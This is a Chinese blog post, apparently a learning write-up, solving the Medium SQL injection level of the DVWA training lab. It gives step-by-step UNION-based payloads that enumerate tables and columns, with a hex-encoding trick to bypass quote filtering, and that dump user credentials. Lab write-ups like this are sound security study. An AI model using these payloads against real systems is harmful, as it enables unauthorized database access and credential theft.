DVWA sql注入 (Medium)

上节虽然写了low,可是发现自己对判断是否有注入点还有判断是字符型注入或数字型注入还是不太清楚,于是又找了一个讲解:
https://www.cnblogs.com/qq3285862072/p/9439573.html
现在开始做medium的SQL注入
由于上面不方便直接输入,于是用burpsuite进行拦截然后修改
1.改成1'DVWA sql注入 (Medium)_第1张图片改成1 and 1=1
DVWA sql注入 (Medium)_第2张图片改成1 and 1=2
DVWA sql注入 (Medium)_第3张图片则可以判断为数字型注入
2.获取字段数,
输入1 order by 2%23
DVWA sql注入 (Medium)_第4张图片由于上节已经演示过了,所以这次就简单一点,可得出字段数为2
3,获取数据库名
输入1 union select 1,database()%23
DVWA sql注入 (Medium)_第5张图片可以看到数据库名为dvwa
4,获取表名
输入1 union select 1,group_concat(table_name)from information_schema.tables where table_schema=database()%23
DVWA sql注入 (Medium)_第6张图片这里不识别单引号,所以把平时用的’dvwa’直接用 database()代替,
于是获取到了表名 guestbook和users
5,获取表中的列(以users为例)
输入1 union select 1,group_concat(column_name)from information_schema.columns where table_name=0x7573657273%23
DVWA sql注入 (Medium)_第7张图片同样的道理,这里因为不识别单引号,而不能用’users’,而是使用users的16进制数0x7573657273,
于是,我们获取了users表里面所有的列名。
6,获取某列里的数据 (以获取user和password为例)
输入=1 union select group_concat(user),group_concat(password)from users%23
DVWA sql注入 (Medium)_第8张图片于是,我们获取了user和password列里的所有数据

DVWA sql注入 (Medium)到这里就结束了。。。

你可能感兴趣的:(web安全)